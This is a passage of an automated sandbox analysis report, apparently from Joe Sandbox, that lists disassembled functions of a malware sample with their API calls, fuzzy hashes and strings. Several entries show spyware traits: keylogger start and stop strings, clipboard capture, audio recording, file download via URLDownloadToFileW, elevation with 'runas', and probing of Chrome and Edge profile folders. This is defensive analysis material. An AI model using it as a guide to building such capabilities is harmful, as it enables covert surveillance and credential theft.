CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C189

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: ad13b29b5186b8d2a777d246caf505faf64a93951fc8710eab1e0b4fee4cd567
Instruction ID: dfdfa86792278b502d1eb42efa140159a66a7ff1f98b550c11ab3cc3ce1a0da6
Opcode Fuzzy Hash: ad13b29b5186b8d2a777d246caf505faf64a93951fc8710eab1e0b4fee4cd567
Instruction Fuzzy Hash: 04012B312C0314BBD61057949C89FF7B26CDB48B56F000167F904D21A2EFA4CC818A69

Uniqueness

Uniqueness Score: -1.00%

Function 004397A3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004397BA

Part of subcall function 00439DF2: ___AdjustPointer.LIBCMT ref: 00439E3C

_UnwindNestedFrames.LIBCMT ref: 004397D1
___FrameUnwindToState.LIBVCRUNTIME ref: 004397E3
CallCatchBlock.LIBVCRUNTIME ref: 00439807

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: be155fe4af78ede5c1a3c25ed52085de123386828037b7556834d3f12658177e
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: E1010532000509BBCF12AF55CC41E9A3BAAEF4C714F14901AF91861121C3BAE861DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9BE4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00CC9CE0,00000000,?,00CCF6A6,00000000,00000000,00CC9CE0,?,?,00000000,00000000,00000001), ref: 00CC9BFA
GetLastError.KERNEL32(?,00CCF6A6,00000000,00000000,00CC9CE0,?,?,00000000,00000000,00000001,00000000,00000000,?,00CC9CE0,00000000,00000104), ref: 00CC9C04
__dosmaperr.LIBCMT ref: 00CC9C0B

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 7cc8c614f4d0714d1c07f39f9de18242949781b501790c41a059482a9bb9b58d
Instruction ID: d621ce72b4515d75933b1d2ae03cc5073bae6c05d8568f745a9a6e554fbdcdf2
Opcode Fuzzy Hash: 7cc8c614f4d0714d1c07f39f9de18242949781b501790c41a059482a9bb9b58d
Instruction Fuzzy Hash: BEF06932200616BB8B206BA2CC08F6ABFA9FF443A03008529F429D6520D731E861DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9B7B Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00CC9CE0,00000000,?,00CCF71B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00CC9B91
GetLastError.KERNEL32(?,00CCF71B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00CC9CE0,00000000,00000104,?), ref: 00CC9B9B
__dosmaperr.LIBCMT ref: 00CC9BA2

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: e9c6864003f9423f7cb126fbe4321a774f15465195c880e8e8dd9f702133b541
Instruction ID: 3df819d765015c38f492acc22c08c878e7a2678d7f7066068de2ab842ce8e320
Opcode Fuzzy Hash: e9c6864003f9423f7cb126fbe4321a774f15465195c880e8e8dd9f702133b541
Instruction Fuzzy Hash: B2F03C32600515BB8B206FA2EC0CF5ABFA9FF483A03048559F52ED6520D731ED61DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00419331 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0041933E
GetSystemMetrics.USER32 ref: 00419344
GetSystemMetrics.USER32 ref: 0041934A
GetSystemMetrics.USER32 ref: 00419350

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: a8a10265127c763042278c4190aab65d811543c76a51fb13ac7f57df5cb55ee0
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: 1CF0AFB1B0432A4BD700EE758C55A6F6BD9ABD9364F10083FF61987281EEACDC458B85

Uniqueness

Uniqueness Score: -1.00%

Function 00CD3DAF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00CB48D0,00000000,00CE17E8,00000000,00CB48D0,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0), ref: 00CD3DC6
GetLastError.KERNEL32(?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000,00CB48D0,?,00CCF432,00CB48D0), ref: 00CD3DD2

Part of subcall function 00CD3D98: CloseHandle.KERNEL32(FFFFFFFE,00CD3DE2,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000,00CB48D0), ref: 00CD3DA8

___initconout.LIBCMT ref: 00CD3DE2

Part of subcall function 00CD3D5A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CD3D89,00CD33F4,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000), ref: 00CD3D6D

WriteConsoleW.KERNEL32(00CB48D0,00000000,00CE17E8,00000000,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000), ref: 00CD3DF7

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: defc4f51f8777ae306f9f83015c490b59974d615af36779577a16d62f85d3490
Instruction ID: 0a725f557f8091cb3250c736169271bf7ca53c248fcb988dcf5195326c9fedbc
Opcode Fuzzy Hash: defc4f51f8777ae306f9f83015c490b59974d615af36779577a16d62f85d3490
Instruction Fuzzy Hash: 2CF01C360111D8BBCF222F95DC09B8D3F67FB083A1B044011FA1986230C732AA64AFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CC7BC1 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CC7BCA

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CC7A83), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(?,?,00CC7A83), ref: 00CC8979

_free.LIBCMT ref: 00CC7BDD
_free.LIBCMT ref: 00CC7BEE
_free.LIBCMT ref: 00CC7BFF

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1ac0fd3876493d355ec9ae33cfc928b78fa0a7262bb9afd0908adecd33839de4
Instruction ID: 61364ed3c3bb48ae063cd6cde11121979403e16f87bc24a1d2931dc027e6499e
Opcode Fuzzy Hash: 1ac0fd3876493d355ec9ae33cfc928b78fa0a7262bb9afd0908adecd33839de4
Instruction Fuzzy Hash: 58E04679809AA0AB8B022F64FCC1B1E3BB1A708714322090EF6000B231CF314052BF86

Uniqueness

Uniqueness Score: -1.00%

Function 00438E71 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438E71
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438E76
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438E7B

Part of subcall function 0043A37A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A38B

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438E90

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: f0afba6f7780d5bf74e6a5573e22c31841aeff3766371a409bd4a5a5d01ecf52
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 60C00244480345545C507AB256132AE83005AAE78CF8474CFBD90976038F4F042BA47F

Uniqueness

Uniqueness Score: -1.00%

Function 00CB3C30 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 320sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB2B70: RegOpenKeyExA.ADVAPI32(?,00000400,00000000,00000001,?), ref: 00CB2CC1
Part of subcall function 00CB2B70: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?), ref: 00CB2CE9
Part of subcall function 00CB2B70: RegCloseKey.ADVAPI32(?,?,00000400,00000000,00000001,?), ref: 00CB2CF2

Part of subcall function 00CB3C30: ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 00CB36ED

Sleep.KERNEL32(000003E8), ref: 00CB3CDA
SetCurrentDirectoryA.KERNEL32(?,00000000,?), ref: 00CB3E3A

Strings

runas, xrefs: 00CB36AF

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseCurrentDirectoryExecuteOpenQueryShellSleepValue
String ID: runas
API String ID: 203667995-4000483414
Opcode ID: ab0b8c8af1a05765e033405e23ecfc0efcd941ea44c841d3c0376ded647b872c
Instruction ID: 1b6fe5ad244bb103202bf5ed356dea60cc461e015a26d8dfa6f7cc460930bf25
Opcode Fuzzy Hash: ab0b8c8af1a05765e033405e23ecfc0efcd941ea44c841d3c0376ded647b872c
Instruction Fuzzy Hash: 5EB10471A101846BDF08EB78DD86BAD7B329F82304F24425CF8459B2D7EB35DA818791

Uniqueness

Uniqueness Score: -1.00%

Function 00442B9D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00442C2D

Strings

pow, xrefs: 00442C05, 00442C22

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 7999687525a5f056358f4945bcea889633b97b56b968074450efa294ab446d87
Instruction ID: 800cb06e21c1ea329817983786c60422269b4338f3bf5502af9070688d2886a7
Opcode Fuzzy Hash: 7999687525a5f056358f4945bcea889633b97b56b968074450efa294ab446d87
Instruction Fuzzy Hash: F8515761E0420286FB117B14CE4137F6B94DB40B52F604D6BF096863AAEA7CCCD59A4F

Uniqueness

Uniqueness Score: -1.00%

Function 0044EFD9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0044EBAC: GetOEMCP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBD7

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EE7A,?,00000000), ref: 0044F04D
GetCPInfo.KERNEL32(00000000,zD,?,?,?,0044EE7A,?,00000000), ref: 0044F060

Strings

zD, xrefs: 0044F05B, 0044F05E

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: zD
API String ID: 546120528-361017932
Opcode ID: d909b0be240222fe978c7b716fa69cf7422d1dad7e7577119cbb316c27c3ad00
Instruction ID: 95e1a41fa6d7b96ba5c2a24ac673e79d39a036a2d94f7298004cea64e63b24f6
Opcode Fuzzy Hash: d909b0be240222fe978c7b716fa69cf7422d1dad7e7577119cbb316c27c3ad00
Instruction Fuzzy Hash: 4051F471A002569EFB20CF76C8816BBBBE5EF81314F14807FD48687252D63D994ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 004346BE: __onexit.LIBCMT ref: 004346C4

__Init_thread_footer.LIBCMT ref: 0040B6E5

Strings

[End of clipboard], xrefs: 0040B727
[Text copied to clipboard], xrefs: 0040B734

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 0a76b94eed9a08ec5b985df72ed2e6a5023733a010cc686f9691e10a4908fbbc
Instruction ID: 16c0118c4940dc8c8cdefc39caf5514adba26d66fbf19c316674452536a64041
Opcode Fuzzy Hash: 0a76b94eed9a08ec5b985df72ed2e6a5023733a010cc686f9691e10a4908fbbc
Instruction Fuzzy Hash: 4F215E31A001155ACB04FB66DC929EEB365EF94318F10443FE905771D2EF386D4A8A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00451A78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451CD3,?,00000050,?,?,?,?,?), ref: 00451B53

Strings

ACP, xrefs: 00451A96
OCP, xrefs: 00451ACC

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 36be01f97a537e8ba0716070fa63bca62691f225810e3a6ae3673f48be3d0d2c
Instruction ID: 2aace4edf02333579f01dd7c3f1da6a92a169870855e4ac957397fbfc8aeaab6
Opcode Fuzzy Hash: 36be01f97a537e8ba0716070fa63bca62691f225810e3a6ae3673f48be3d0d2c
Instruction Fuzzy Hash: 97214B66A01100A2D7319B54CD41F9B73AADF54B16F168427ED0AD7322F73AED48C358

Uniqueness

Uniqueness Score: -1.00%

Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415C17,?,00000001,0000004C,00000000), ref: 00405030

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415C17,?,00000001,0000004C,00000000), ref: 00405087

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040501F

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 2ff53a8d23a981aa545793ac31cbd4e6d03cb5d17771411f6f8dce199051bbd5
Instruction ID: 408d130ebb64bbfd0941b37d565a602b4c828654bbe33badbbaee97ad12a9a8a
Opcode Fuzzy Hash: 2ff53a8d23a981aa545793ac31cbd4e6d03cb5d17771411f6f8dce199051bbd5
Instruction Fuzzy Hash: 7D2104719006405BD700B735980677F7BA4EB51308F84087EE8491B2E2EABD5A88CBEF

Uniqueness

Uniqueness Score: -1.00%

Function 00416589 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0041658E
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004165F0

Strings

!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: 5204d5ebba49abcec9b2b75e421dbb2f3c49301a5bbfff731c75bc7ca4e4003c
Instruction ID: 8eac3a0e3f46d7fc50306be76c602f9c05c650d7e8bc35a92d0807ed5fefabc8
Opcode Fuzzy Hash: 5204d5ebba49abcec9b2b75e421dbb2f3c49301a5bbfff731c75bc7ca4e4003c
Instruction Fuzzy Hash: E51151716083429AC714FF72D8969BE73A8AF50348F400C3FF546621E2EE3C9949C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0041B43D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B457

Strings

%02i:%02i:%02i:%03i , xrefs: 0041B46C
| , xrefs: 0041B48A

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 0965455ac3cc5cd251e471c145658d9518680e0d00218565a943323c8c49139a
Instruction ID: 03358708bbd9b017bd50802dda466b5f99439c3f85cc638ee3aa4cbb1873ed31
Opcode Fuzzy Hash: 0965455ac3cc5cd251e471c145658d9518680e0d00218565a943323c8c49139a
Instruction Fuzzy Hash: CD1181715082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA48C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC65 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0041AC8A

Strings

alarm.wav, xrefs: 0041AC75
hYG, xrefs: 0041AC94

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$hYG
API String ID: 1174141254-2782910960
Opcode ID: cf1de3ebf6c25645386c743ed1e09933b39a6016a5cd876360c304ceb06d9f1d
Instruction ID: 6fbaea307e372094891d743aaee9c0f939e2fdd96fa8816cbaee0bb86098aa9c
Opcode Fuzzy Hash: cf1de3ebf6c25645386c743ed1e09933b39a6016a5cd876360c304ceb06d9f1d
Instruction Fuzzy Hash: 4601B5B064460167C604B73598166EE37564B80328F10407FF68A672E2FFBC9D99C6DF

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B0B2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B0C0
Part of subcall function 0040B0B2: wsprintfW.USER32 ref: 0040B141

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

CloseHandle.KERNEL32(?), ref: 0040B002
UnhookWindowsHookEx.USER32 ref: 0040B015

Strings

Online Keylogger Stopped, xrefs: 0040AFAF, 0040AFB7, 0040AFDE

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 2859d79f17bbf3e4fb0ac891c95f1c75937c0af30917608a24bf154840fbb95d
Instruction ID: 1efb9077e68cf03edcab76f53168a10b3f917b6d2ceb1aad6be5b684b2c268e0
Opcode Fuzzy Hash: 2859d79f17bbf3e4fb0ac891c95f1c75937c0af30917608a24bf154840fbb95d
Instruction Fuzzy Hash: A301B531A002109BD7257B75C80B7BE7BA59B41305F4004BFEA82226D2EBB91855D7DF

Uniqueness

Uniqueness Score: -1.00%

Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(?,00000020,?,?,00476B40,00474EE0,?,00000000,00401A15), ref: 00401849
waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F

Strings

XMG, xrefs: 004017F8

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004489A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,*JD,00000000,00000001,?,?,00444A2A,?,?,?,?,00000004), ref: 004489F2

Strings

IsValidLocaleName, xrefs: 004489B7, 004489C1
*JD, xrefs: 004489E9, 004489D6

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: *JD$IsValidLocaleName
API String ID: 1901932003-3028385341
Opcode ID: 3e8a7637d397ee6081e064619c1c062965aab6a3a575e50bfd46f824d2566911
Instruction ID: 00ed84e355f5da9bae20177a078cc614c93cb7288f224e07fdc481b4eaf2d14a
Opcode Fuzzy Hash: 3e8a7637d397ee6081e064619c1c062965aab6a3a575e50bfd46f824d2566911
Instruction Fuzzy Hash: C9F0BE30A80A08F7DB106B61DC06BAE7E64CB44B12F10416AFE056B292CEB95E45969E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C4A7

Strings

\AppData\Local\Microsoft\Edge\, xrefs: 0040C491
UserProfile, xrefs: 0040C47B

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 2e063ffa96777bda5fb0c71964088532bb2cef58f9105dceed0029cb0f556605
Instruction ID: b80ae851aa5927822d0c51d0b35e317520b22a8e9d88b83e7a71d4e2fe34f5f7
Opcode Fuzzy Hash: 2e063ffa96777bda5fb0c71964088532bb2cef58f9105dceed0029cb0f556605
Instruction Fuzzy Hash: 88F05E31A0021996C604BBF69C578FF7B2C9D10709B10017FB601B21D2EE7C994186EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C411 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C444

Strings

UserProfile, xrefs: 0040C418
\AppData\Local\Google\Chrome\, xrefs: 0040C42E

Memory Dump Source

